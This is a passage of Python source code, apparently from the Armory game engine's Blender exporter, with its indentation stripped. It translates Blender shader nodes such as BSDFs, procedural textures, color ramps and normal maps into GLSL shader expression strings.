bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1])
if parse_surface:
out_basecol = '({0} + {1})'.format(bc1, bc2)
out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2)
out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2)
out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2)
out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2)
out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2)
if parse_opacity:
out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2)
elif node.type == 'BSDF_PRINCIPLED':
if parse_surface:
write_normal(node.inputs[19])
out_basecol = parse_vector_input(node.inputs[0])
# subsurface = parse_vector_input(node.inputs[1])
# subsurface_radius = parse_vector_input(node.inputs[2])
# subsurface_color = parse_vector_input(node.inputs[3])
out_metallic = parse_value_input(node.inputs[4])
out_specular = parse_value_input(node.inputs[5])
# specular_tint = parse_vector_input(node.inputs[6])
out_roughness = parse_value_input(node.inputs[7])
# aniso = parse_vector_input(node.inputs[8])
# aniso_rot = parse_vector_input(node.inputs[9])
# sheen = parse_vector_input(node.inputs[10])
# sheen_tint = parse_vector_input(node.inputs[11])
# clearcoat = parse_vector_input(node.inputs[12])
# clearcoat_rough = parse_vector_input(node.inputs[13])
# ior = parse_vector_input(node.inputs[14])
# transmission = parse_vector_input(node.inputs[15])
# transmission_roughness = parse_vector_input(node.inputs[16])
if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0:
out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17]))
emission_found = True
# clearcoar_normal = parse_vector_input(node.inputs[20])
# tangent = parse_vector_input(node.inputs[21])
if parse_opacity:
if len(node.inputs) > 20:
out_opacity = parse_value_input(node.inputs[18])
elif node.type == 'BSDF_DIFFUSE':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_specular = '0.0'
elif node.type == 'BSDF_GLOSSY':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'AMBIENT_OCCLUSION':
if parse_surface:
# Single channel
out_occlusion = parse_vector_input(node.inputs[0]) + '.r'
elif node.type == 'BSDF_ANISOTROPIC':
if parse_surface:
write_normal(node.inputs[4])
# Revert to glossy
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'EMISSION':
if parse_surface:
# Multiply basecol
out_basecol = parse_vector_input(node.inputs[0])
out_emission = '1.0'
emission_found = True
emission_strength = parse_value_input(node.inputs[1])
out_basecol = '({0} * {1})'.format(out_basecol, emission_strength)
elif node.type == 'BSDF_GLASS':
if parse_surface:
write_normal(node.inputs[3])
out_roughness = parse_value_input(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_HAIR':
pass
elif node.type == 'HOLDOUT':
if parse_surface:
# Occlude
out_occlusion = '0.0'
elif node.type == 'BSDF_REFRACTION':
# write_normal(node.inputs[3])
pass
elif node.type == 'SUBSURFACE_SCATTERING':
if parse_surface:
write_normal(node.inputs[4])
out_basecol = parse_vector_input(node.inputs[0])
elif node.type == 'BSDF_TOON':
# write_normal(node.inputs[3])
pass
elif node.type == 'BSDF_TRANSLUCENT':
if parse_surface:
write_normal(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_TRANSPARENT':
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_VELVET':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = '1.0'
out_metallic = '1.0'
elif node.type == 'VOLUME_ABSORPTION':
pass
elif node.type == 'VOLUME_SCATTER':
pass
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_displacement_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_displacement_input(l.from_node.inputs[0])
return parse_vector_input(inp)
else:
return None
def parse_vector_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_vector_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return res_var
else: # VALUE
return 'vec3({0})'.format(res_var)
else:
if inp.type == 'VALUE': # Unlinked reroute
return to_vec3([0.0, 0.0, 0.0])
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec3(inp.default_value)
def parse_vector(node, socket):
global particle_info
global sample_bump
global sample_bump_res
# RGB
if node.type == 'GROUP':
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'VERTEX_COLOR':
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
elif node.type == 'ATTRIBUTE':
if socket == node.outputs[0]: # Color
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
else: # Vector
con.add_elem('tex', 'short2norm') # UVMaps only for now
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.attribute_name == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'RGB':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec3(socket.default_value)
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
col3 = parse_vector_input(node.inputs[3])
scale = parse_value_input(node.inputs[4])
res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
scale = parse_value_input(node.inputs[3])
res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_ENVIRONMENT':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.rgb'.format(store_var_name(node))
tex_name = node_name(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB'
res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link))
else:
global parsed
tex_store = store_var_name(node) # Pink color for missing texture
parsed[tex_store] = True
curshader.write_textures += 1
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
curshader.write_textures -= 1
return '{0}.rgb'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
curshader.add_function(c_functions.str_tex_noise)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
# Slow..
res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_SKY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'BRIGHTCONTRAST':
out_col = parse_vector_input(node.inputs[0])
bright = parse_value_input(node.inputs[1])
contr = parse_value_input(node.inputs[2])
curshader.add_function(c_functions.str_brightcontrast)
return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr)
elif node.type == 'GAMMA':
out_col = parse_vector_input(node.inputs[0])
gamma = parse_value_input(node.inputs[1])
return 'pow({0}, vec3({1}))'.format(out_col, gamma)
elif node.type == 'HUE_SAT':
curshader.add_function(c_functions.str_hue_sat)
hue = parse_value_input(node.inputs[0])
sat = parse_value_input(node.inputs[1])
val = parse_value_input(node.inputs[2])
fac = parse_value_input(node.inputs[3])
col = parse_vector_input(node.inputs[4])
return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac)
elif node.type == 'INVERT':
fac = parse_value_input(node.inputs[0])
out_col = parse_vector_input(node.inputs[1])
return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac)
elif node.type == 'MIX_RGB':
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
blend = node.blend_type
if blend == 'MIX':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'ADD':
out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'MULTIPLY':
out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SUBTRACT':
out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SCREEN':
out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var)
elif blend == 'DIVIDE':
out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var)
elif blend == 'DIFFERENCE':
out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var)
elif blend == 'DARKEN':
out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'LIGHTEN':
out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'OVERLAY':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'DODGE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'BURN':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'HUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SATURATION':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'VALUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'COLOR':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SOFT_LIGHT':
out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac)
elif blend == 'LINEAR_LIGHT':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
# out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var)
if node.use_clamp:
return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col)
else:
return out_col
elif node.type == 'BLACKBODY':
t = float(parse_value_input(node.inputs[0]))
rgb = [0,0,0]
blackbody_table_r = [
[2.52432244e+03, -1.06185848e-03, 3.11067539e+00],
[3.37763626e+03, -4.34581697e-04, 1.64843306e+00],
[4.10671449e+03, -8.61949938e-05, 6.41423749e-01],
[4.66849800e+03, 2.85655028e-05, 1.29075375e-01],
[4.60124770e+03, 2.89727618e-05, 1.48001316e-01],
[3.78765709e+03, 9.36026367e-06, 3.98995841e-01]
]
blackbody_table_g = [
[-7.50343014e+02, 3.15679613e-04, 4.73464526e-01],
[-1.00402363e+03, 1.29189794e-04, 9.08181524e-01],
[-1.22075471e+03, 2.56245413e-05, 1.20753416e+00],
[-1.42546105e+03, -4.01730887e-05, 1.44002695e+00],
[-1.18134453e+03, -2.18913373e-05, 1.30656109e+00],
[-5.00279505e+02, -4.59745390e-06, 1.09090465e+00]
]
blackbody_table_b = [
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02],
[-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01],
[6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01]
]
if (t >= 12000):
rgb[0] = 0.826270103
rgb[1] = 0.994478524
rgb[2] = 1.56626022
elif (t < 965.0):
rgb[0] = 4.70366907
rgb[1] = 0.0
rgb[2] = 0.0
else:
if (t >= 6365.0):
i = 5
elif(t >= 3315.0):
i = 4
elif(t >= 1902.0):
i = 3
elif(t >= 1449.0):
i = 2
elif(t >= 1167.0):
i = 1
else:
i = 0
r = blackbody_table_r[i]
g = blackbody_table_g[i]
b = blackbody_table_b[i]
t_inv = 1.0 / t
rgb[0] = r[0] * t_inv + r[1] * t + r[2]
rgb[1] = g[0] * t_inv + g[1] * t + g[2]
rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3]
# Pass constant
return to_vec3([rgb[0], rgb[1], rgb[2]])
elif node.type == 'VALTORGB': # ColorRamp
fac = parse_value_input(node.inputs[0])
interp = node.color_ramp.interpolation
elems = node.color_ramp.elements
if len(elems) == 1:
return to_vec3(elems[0].color)
# Write cols array
cols_var = node_name(node.name) + '_cols'
curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2]))
# Get index
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(elems)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, elems[i].position)
# Write index
index_var = node_name(node.name) + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
if interp == 'CONSTANT':
return '{0}[{1}]'.format(cols_var, index_var)
else: # Linear
# Write facs array
facs_var = node_name(node.name) + '_facs'
curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position))
# Mix color
# float f = (pos - start) * (1.0 / (finish - start))
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var)
elif node.type == 'CURVE_VEC': # Vector Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type # bezier curve
return '(vec3({0}, {1}, {2}) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac)
elif node.type == 'CURVE_RGB': # RGB Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type
return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\
vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points))
elif node.type == 'COMBHSV':
curshader.add_function(c_functions.str_hue_sat)
h = parse_value_input(node.inputs[0])
s = parse_value_input(node.inputs[1])
v = parse_value_input(node.inputs[2])
return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v)
elif node.type == 'COMBRGB':
r = parse_value_input(node.inputs[0])
g = parse_value_input(node.inputs[1])
b = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(r, g, b)
elif node.type == 'WAVELENGTH':
curshader.add_function(c_functions.str_wavelength_to_rgb)
wl = parse_value_input(node.inputs[0])
# Roughly map to cycles - 450 to 600 nanometers
return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl)
# Vector
elif node.type == 'CAMERA':
# View Vector in camera space
return 'vVecCam'
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[0]: # Position
return 'wposition'
elif socket == node.outputs[1]: # Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[2]: # Tangent
return 'wtangent'
elif socket == node.outputs[3]: # True Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[4]: # Incoming
return 'vVec'
elif socket == node.outputs[5]: # Parametric
return 'mposition'
elif node.type == 'HAIR_INFO':
return 'vec3(0.0)' # Tangent Normal
elif node.type == 'OBJECT_INFO':
return 'wposition'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[3]: # Location
particle_info['location'] = True
return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[5]: # Velocity
particle_info['velocity'] = True
return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[6]: # Angular Velocity
particle_info['angular_velocity'] = True
return 'vec3(0.0)'
elif node.type == 'TANGENT':
return 'wtangent'
elif node.type == 'TEX_COORD':
#obj = node.object
#instance = node.from_instance
if socket == node.outputs[0]: # Generated - bounds
return 'bposition'
elif socket == node.outputs[1]: # Normal
return 'n'
elif socket == node.outputs[2]: # UV
con.add_elem('tex', 'short2norm')
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif socket == node.outputs[3]: # Object
return 'mposition'
elif socket == node.outputs[4]: # Camera
return 'vec3(0.0)' # 'vposition'
elif socket == node.outputs[5]: # Window
return 'vec3(0.0)' # 'wvpposition'
elif socket == node.outputs[6]: # Reflection
return 'vec3(0.0)'
elif node.type == 'UVMAP':
#instance = node.from_instance
con.add_elem('tex', 'short2norm')
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'):
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.uv_map == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'BUMP':
# Interpolation strength
strength = parse_value_input(node.inputs[0])
# Height multiplier
# distance = parse_value_input(node.inputs[1])
sample_bump = True
height = parse_value_input(node.inputs[2])
sample_bump = False
nor = parse_vector_input(node.inputs[3])
if sample_bump_res != '':
if node.invert:
ext = ['1', '2', '3', '4']
else:
ext = ['2', '1', '4', '3']
curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3]))
curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength))
curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res))
curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res))
res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res)
sample_bump_res = ''
else:
res = 'n'
return res
elif node.type == 'MAPPING':
out = parse_vector_input(node.inputs[0])
scale = node.inputs['Scale'].default_value
rotation = node.inputs['Rotation'].default_value
location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0]
if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0:
out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2])
if rotation[2] != 0.0:
# ZYX rotation, Z axis for now..
a = rotation[2]
# x * cos(theta) - y * sin(theta)
# x * sin(theta) + y * cos(theta)
out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[1] != 0.0:
# a = node.rotation[1]
# out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[0] != 0.0:
# a = node.rotation[0]
# out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0:
out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2])
# use Extension parameter from the Texture node instead
# if node.use_min:
# out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1])
# if node.use_max:
# out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1])
return out
elif node.type == 'NORMAL':
if socket == node.outputs[0]:
return to_vec3(node.outputs[0].default_value)
elif socket == node.outputs[1]: # TODO: is parse_value path preferred?
nor = parse_vector_input(node.inputs[0])
return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'NORMAL_MAP':
if curshader == tese:
return parse_vector_input(node.inputs[1])
else:
#space = node.space
#map = node.uv_map
# Color
parse_normal_map_color_input(node.inputs[1], node.inputs[0])
return None
elif node.type == 'VECT_TRANSFORM':
#type = node.vector_type
#conv_from = node.convert_from
#conv_to = node.convert_to
# Pass throuh
return parse_vector_input(node.inputs[0])
elif node.type == 'COMBXYZ':
x = parse_value_input(node.inputs[0])
y = parse_value_input(node.inputs[1])
z = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(x, y, z)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'ADD':
return '({0} + {1})'.format(vec1, vec2)
elif op == 'SUBTRACT':
return '({0} - {1})'.format(vec1, vec2)
elif op == 'AVERAGE':
return '(({0} + {1}) / 2.0)'.format(vec1, vec2)
elif op == 'DOT_PRODUCT':
return 'vec3(dot({0}, {1}))'.format(vec1, vec2)
elif op == 'CROSS_PRODUCT':
return 'cross({0}, {1})'.format(vec1, vec2)
elif op == 'NORMALIZE':
return 'normalize({0})'.format(vec1)
elif node.type == 'DISPLACEMENT':
height = parse_value_input(node.inputs[0])
midlevel = parse_value_input(node.inputs[1])
scale = parse_value_input(node.inputs[2])
nor = parse_vector_input(node.inputs[3])
return '(vec3({0}) * {1})'.format(height, scale)
def parse_normal_map_color_input(inp, strength_input=None):
global normal_parsed
global frag
if basecol_only:
return
if inp.is_linked == False:
return
if normal_parsed:
return
normal_parsed = True
frag.write_normal += 1
if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix
frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
frag.write('texn.y = -texn.y;')
frag.add_include('std/normals.glsl')
frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);')
frag.write('n = TBN * normalize(texn);')
else:
frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
if strength_input != None:
strength = parse_value_input(strength_input)
if strength != '1.0':
frag.write('n.xy *= {0};'.format(strength))
frag.write('n = normalize(TBN * n);')
con.add_elem('tang', 'short4norm')
frag.write_normal -= 1
def parse_value_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_value_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return '{0}.x'.format(res_var)
else: # VALUE
return res_var
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec1(inp.default_value)
def parse_value(node, socket):
global particle_info
global sample_bump
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
# Displacement
if socket == node.outputs[1]:
return parse_value_input(node.inputs[7])
else:
return None
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'ATTRIBUTE':
# Pass time till drivers are implemented
if node.attribute_name == 'time':
curshader.add_uniform('float time', link='_time')
return 'time'
else:
return '0.0'
elif node.type == 'CAMERA':
# View Z Depth
if socket == node.outputs[1]:
curshader.add_include('std/math.glsl')
curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
return 'linearize(gl_FragCoord.z, cameraProj)'
# View Distance
else:
curshader.add_uniform('vec3 eye', link='_cameraPosition')
return 'distance(eye, wposition)'
elif node.type == 'FRESNEL':
curshader.add_function(c_functions.str_fresnel)
ior = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
return 'fresnel({0}, {1})'.format(ior, dotnv)
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[6]: # Backfacing
return '(1.0 - float(gl_FrontFacing))'
elif socket == node.outputs[7]: # Pointiness
return '0.0'
elif node.type == 'HAIR_INFO':
# Is Strand
# Intercept
# Thickness
return '0.5'
elif node.type == 'LAYER_WEIGHT':
blend = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
if socket == node.outputs[0]: # Fresnel
curshader.add_function(c_functions.str_fresnel)
return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv)
